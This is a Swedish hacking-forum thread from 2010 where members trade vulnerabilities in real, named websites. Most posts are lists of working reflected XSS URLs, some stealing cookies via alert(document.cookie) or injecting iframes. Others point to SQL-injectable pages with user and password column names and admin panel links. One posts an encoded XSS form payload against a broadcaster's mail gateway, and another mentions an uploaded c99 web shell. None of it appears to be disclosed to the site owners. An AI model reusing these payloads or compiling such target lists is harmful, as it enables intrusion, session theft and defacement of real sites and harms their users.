1. Dator och IT
  2. IT-säkerhet

Samling av sidor med säkerhetsbrister - Del 2

Svara
2010-11-16, 22:45
  #1777
Tomte-morfar
Medlem
http://topstreetwear.com/

Citat:
Microsoft JScript runtime error '800a139e'

{ ? = call ps_search_cached_products_tsw(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) }: parameter error (langid:NaN)

/lib/include/ps_base_functions.asp, line 471

Är det något?
Förlåt mig om det är fel, Jag är inte överdrivet kunnig lovar att läsa på lite
Citera
2010-11-16, 23:10
  #1778
TMM
Medlem
TMMs avatar
Citat:
Ursprungligen postat av xiM3T
Jag tog inte all cred, utan såg till att hacket vart genomfört som han inte kunde.
Och med att han inte kunde så blir det automatiskt att jag tar all cred för mitt jobb som jag har gjort för att hacka hemsidan på nytt.

Wow, vilket hack. En redirect. Det måste ha varit fruktansvärt besvärligt att göra. Och sedan påstå, på en helt annan webserver, att man hackat sidan.
Citera
2010-11-17, 00:15
  #1779
tmxseven
Medlem
tmxsevens avatar
http://www.imobile.pk/index.php?mod=...feedbacks&id=1

user_login:user_pass:user_nicename:user_email:user _url:user_registered:user_activation_key:user_stat us:display_name:
http://www.mfhimalayas.org/article.php?id=1

full_name:login_id: password:group_id:
Admin Kontroll Panel: http://www.mfhimalayas.org/admin/index.php
__________________
Senast redigerad av tmxseven 2010-11-17 kl. 00:19.
Citera
2010-11-17, 09:33
  #1780
xiM3T
Medlem
Citat:
Ursprungligen postat av tmxseven
http://www.imobile.pk/index.php?mod=...feedbacks&id=1

user_login:user_pass:user_nicename:user_email:user _url:user_registered:user_activation_key:user_stat us:display_name:
http://www.mfhimalayas.org/article.php?id=1

full_name:login_id: password:group_id:
Admin Kontroll Panel: http://www.mfhimalayas.org/admin/index.php

Denna sida har vart hackad tidigare.
Citera
2010-11-17, 11:34
  #1781
tmxseven
Medlem
tmxsevens avatar
Citat:
Ursprungligen postat av xiM3T
Denna sida har vart hackad tidigare.

Kanske det..
Citera
2010-11-17, 20:10
  #1782
Ryne
Medlem
Rynes avatar
XSS
Kod: 
http://www.topstreetwear.com/system/user/newsletter_save.asp?newsletter=fdsf@fds.com%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
http://www.n.nu/examples.php?beginswith=%3Cmarquee%3EXSS%3C/marquee%3E
Citera
2010-11-17, 21:19
  #1783
fooztr
Medlem
fooztrs avatar
XSS
Kod: 
http://img269.imageshack.us/slideshow/webplayer.php?id=%3Cscript%3Ealert%281337%29;%3C/script%3E
http://nsshop.avg.com/affiliate.html?affiliateid=200066329&publisherid=50169&target=https://flashback.info
http://www.boktipset.se/lists/show_list.cgi?context=search&sort=&sort_dir=&type=book&search_type=multi&key=%22%3E%3Cscript%3Ealert%28lolboll%29%3C%2Fscript%3E
http://xhamster.com/users_search.php?im=Man&looking_for=Woman&age_from=any&age_to=any&country=US&usa_region=&canada_region=&city=%27%22%3E%3Ciframe+src%3D//data.fuskbugg.se/dipdip/____flashback.jpg%3E
http://www.pixbox.se/popup.php?page=usr_nickname_check&body_height=110&usr_nickname=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://www.uppsala.pingst.se/bannerClicked.do?id=0055&href=%22%3E%3C/script%3E%3Cscript%3Ealert%28/uppsala%20suger/%29%3C/script%3E
http://www.emocore.se/?sida=galleri&user=XSSed%3C/TITLE%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&bild=wawa
http://go.tv4.se/go/e/col_1_0;siteId=198/https://flashback.info
__________________
Senast redigerad av fooztr 2010-11-17 kl. 21:35.
Citera
2010-11-17, 21:57
  #1784
Ryne
Medlem
Rynes avatar
XSS
Kod: 
http://schering-plough.se/sok/?searchtext=%22%3E%3CSCRIPT%3Ealert%280%29%3C%2FSCRIPT%3E
http://www.lu.se/o.o.i.s?id=7130&task=listPersons&name=%3CSCRIPT%3Ealert(0)%3C/SCRIPT%3E&search=S%F6k
http://www.avropa.se/templates/Search____11.aspx?q=%22%3E%3CSCRIPT%3Ealert(0)%3C/SCRIPT%3E&w=false
http://lib.nobelbiblioteket.se/search~S0*swe/?searchtype=t&searcharg=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sortdropdown=-&SORT=D&extended=0&SUBMIT=S%F6k&searchlimits=&searchorigarg=taaa
http://www.filmdelta.se/search.php?string=%3Cscript%3Ealert%280%29%3C%2Fscript%3E&type=movie
http://www.tamro.se/sv/sok/?searchtext=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E
http://www.infodirekt.se/search.php?action=search&fsearchb=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&addressb=
http://www.jobinside.se/view_employers_list.php?search_employer_name=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&search_employer_town=&search=s%F6k
http://www.qruiser.com/members/search/?n=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&quicksearch=1
http://www.jobb.nu/search.php?lstCounty=0&lstCategory=0&edSearch=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&btn=S%C3%B6k+jobb.nu&radioSearch=job
http://jobbstart.se/resultat.asp?sellan=100&selyrke=100&seltext=%3CSCRIPT%3Ealert%280%29%3C%2FSCRIPT%3E
http://www.kollega.se/index.cfm?n=60&search=%3CSCRIPT%3Ealert%280%29%3C%2FSCRIPT%3E&x=10&y=13
http://www.linxmusic.se/search_result.asp?composer_name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&order=title
http://www.deeplaymusic.com/left.php3?emailadd=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&submit.x=12&submit.y=8
http://www.hitta.se/SearchMixed.aspx?vad=%3cscript%3ealert(0)%3c%2fscript%3e&var=%3cscript%3ealert(0)%3c%2fscript%3e
http://www.backpacking.se/Discussion/Search.asp?SearchWord=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&BoardId=&where=&SubMenu=1&Submit=++++S%F6k+nu++++&SearchUserName=&SearchName=
http://www.smakassa.se/sokresultat/?q=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E
http://www.ne.se/sok/%22%3E%3Cscript%3Ealert%280%29%3C/script%3E?type=NE
http://pkgsrc.se/search.php?so=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E
http://www.azote.se/index.asp?q=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&s=s%F6k+bilder
http://www.invest-systems.com/page.jsp?menuid=34&node=53&txtKeywords=%3Cscript%3Ealert(0)%3C/script%3E&x=11&y=9
http://www.bigbazar.se/?name=products&file=result&op=search&srch=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&Submit=S%C3%96K
http://www.alandstidningen.ax/search.con?search=%22%3Cscript%3Ealert%280%29%3C%2Fscript%3E
http://www.hig.se/Sok/Sok-personal.html?url=484603415%2Fsitev-sok.php%3Fq%3D%2522%253E%253Cscript%253Ealert%25280%2529%253  C%252Fscript%253E%26sok%3DS%25D6K%26HTTP_REF%3D%26db%3Dsearch%26type%3Dor&sv.url=12.cb1595b120a8eb52a680001633
http://www.smi.se/smi/avancerad-sok/?quicksearchquery=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E
http://www.fhi.se/sv/Sok/?quicksearchquery=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E
https://www.sktf.se/Templates/Page____242.aspx?quicksearch=true&cid=&stext=%2522%253e%253cscript%253ealert(0)%253c%252fscript%253e
http://www.antikviteter.net/cgi-bin/search/search.pl?Range=Any&Format=Standard&Terms=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&S1=S%F6k+l%E4nk+%21&Range=Any&Format=Standard
http://www.bjarredsdesign.se/shop/?s=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&x=0&y=0&s1=on&s2=on&s3=on&s4=on
http://www.ordsprak.se/sokresultat.asp?sokord=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&=S%F6k
http://www.panta.nu/?f=1&s=butik&q=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&=S%D6K
http://www.borlange.se/templates/BlgSearch____3138.aspx?quicksearchquery=%22%3e%3cscript%3ealert(0)%3c%2fscript%3e
http://www.bagarenochkocken.se/shop/?s=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&x=0&y=0&s1=on&s2=on&s3=on&s4=on
http://www.pagina.se/default.asp?val=s%F6k&meddelande=%22%3E%3Cscript%3Ealert(0)%3C/script%3E%20Kan%20ej%20hittas!
http://www.danser.se/sok/index.php?page=search&q=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&dans-web_submit.x=0&dans-web_submit.y=0&area=alla
http://www.infodirekt.se/search.php?action=search&fsearchb=%22%3E%3Cscript%3Ealert(0)%3C%2Fscript%3E
http://www.bilsport.se/newsark.php?sokmain=yes&fritext=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E
http://www.hitlistan.se/netdata/ghl002.mbr/lista?liid=41&dfom=20090923&newi=0&mode=list&navi=noaaa&platform=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
http://www.dhr.se/index.php?page=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
http://www.saco.se/templates/SearchResult.aspx?id=2504&epslanguage=SV&q=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&pageid=3921
http://www.raised.se/index.php?sok=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&list=klaner&p=sok&submit=S%F6k
http://www.tabba.se/headbanner.php?nav=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
http://katalog.muslib.se/wsRecInfo.asp?idno=124709&UnitId=0&DocGrp=0&SearchUnitId=0&LoanUnitId=1&comb=AND&sString=FT=iiANDda%22%3E%3Cscript%3Ealert(0)%3C/script%3E
http://www.jobstar.se/lediga_jobb_som_Grifteg%C3%A5rdsarbetare_Kyrkog%C3%A5rdsarbetare__var_Sverigeaaa%3Cscript%3Ealert(0)  %3C/script%3E
http://www.digitalbazaar.se/?r=v_category&category=29aaa%27%3E%3Cscript%3Ealert(0)%3C/script%3E
http://www.recordstore.co.uk/homeSearch.jsp?SearchALL=aaa%22%3E%3Cscript%3Ealert(0)%3C/script%3E&whereFrom=homeSearch
http://www.raidsonic.de/en/products/mobile-racks.php?pid=2_4%22%3E%3Cscript%3Ealert(0)%3C/script%3E
http://www.europe-machinery.de/annonces.asp?trich=L1&triordre=DESC&page=1&urlrub=schreitbagger&lprop1=32%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
Citera
2010-11-18, 13:41
  #1785
Eh Whatever
Medlem
Eh Whatevers avatar
Citat:
Ursprungligen postat av fooztr
*host* kolla en sida bakåt så ser du vem det var som lämna ut säkerhetshålet samt uppgifter.

Kul att killen tog åt sig all cred, jävla pajas.

Naaaw. OberödingN
Citera
2010-11-18, 14:42
  #1786
secryx
Medlem
secryxs avatar
SVT:
1
När man väl är inloggad kan man köra SQL injektion lite här och där har väl funderat på att kontakta dem om det, men det har inte känts så kul.
http://www.pressinfo.svt.se/app/pres...word=bild2d6Ch

2
Är inget egentligt hack tyckte bara sidan var intressant.
https://distans.svt.se/dana-na/auth/...lt/welcome.cgi


Sverigesradio:
1
Har inte hittat något speciellt kul att sno med det här Xss felet. Men jag ser potential.
http://sverigesradio.se/sida/SokResu...programid=2445

2
Riktigt farligt XSS Fel går att använda på Tusentals sidor. Man tycker ju ändå att novel borde kunna lite.
Kod: 
<html>
<body >
<form action="http://mailgw.sr.se/gw/webpub?User.lang=sv&merge=caption" method="post">
<input type="text" value="&#x78;&#x73;&#x73;&#x22;&#x3C;&#x2F;&#x73;&#x74;&#x79;&#x6C;&#x65;&#x3E;&#x3C;&#x2F;&#x68;&#x65;&#x61;&#x64;&#x3E;&#x3C;&#x62;&#x6F;&#x64;&#x79;&#x20;&#x6F;&#x6E;&#x6D;&#x6F;&#x75;&#x73;&#x65;&#x6D;&#x6F;&#x76;&#x65;&#x20;&#x3D;&#x22;&#x74;&#x72;&#x79;&#x7B;&#x69;&#x66;&#x28;&#x41;&#x77;&#x51;&#x29;&#x41;&#x77;&#x51;&#x3D;&#x31;&#x3B;&#x7D;&#x63;&#x61;&#x74;&#x63;&#x68;&#x28;&#x65;&#x29;&#x7B;&#x41;&#x77;&#x51;&#x3D;&#x31;&#x3B;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3B;&#x7D;&#x22;&#x20;&#x6F;&#x6E;&#x6C;&#x6F;&#x61;&#x64;&#x3D;&#x22;&#x74;&#x72;&#x79;&#x7B;&#x69;&#x66;&#x28;&#x41;  &#x77;&#x51;&#x29;&#x41;&#x77;&#x51;&#x3D;&#x31;&#x3B;&#x7D;&#x63;&#x61;&#x74;&#x63;&#x68;&#x28;&#x65;&#x29;&#x7B;&#x41;&#x77;&#x51;&#x3D;&#x31;&#x3B;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3B;&#x7D;&#x22;&#x3E;&#x61;&#x3C;&#x2F;&#x62;&#x6F;&#x64;&#x79;&#x3E;&#x3C;&#x2F;&#x68;&#x74;&#x6D;&#x6C;&#x3E;&#x3C;&#x21;&#x2D;&#x2D;" name="User.context">
<input type="submit">
</form>
</body>
</html>
Citera
2010-11-18, 14:57
  #1787
Air0x
Medlem
Air0xs avatar
Satt och kollade runt lite på nätet idag hittade detta: http://www.cajsastina.com/guestbook.php alltid kul att leka runt lite med XSS
Citera
2010-11-18, 18:01
  #1788
fooztr
Medlem
fooztrs avatar
Någon har dragit upp c99 shell på den, fast failat.


Citat:
Ursprungligen postat av tmxseven
http://www.mfhimalayas.org/article.php?id=1

full_name:login_id: password:group_id:
Admin Kontroll Panel: http://www.mfhimalayas.org/admin/index.php
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in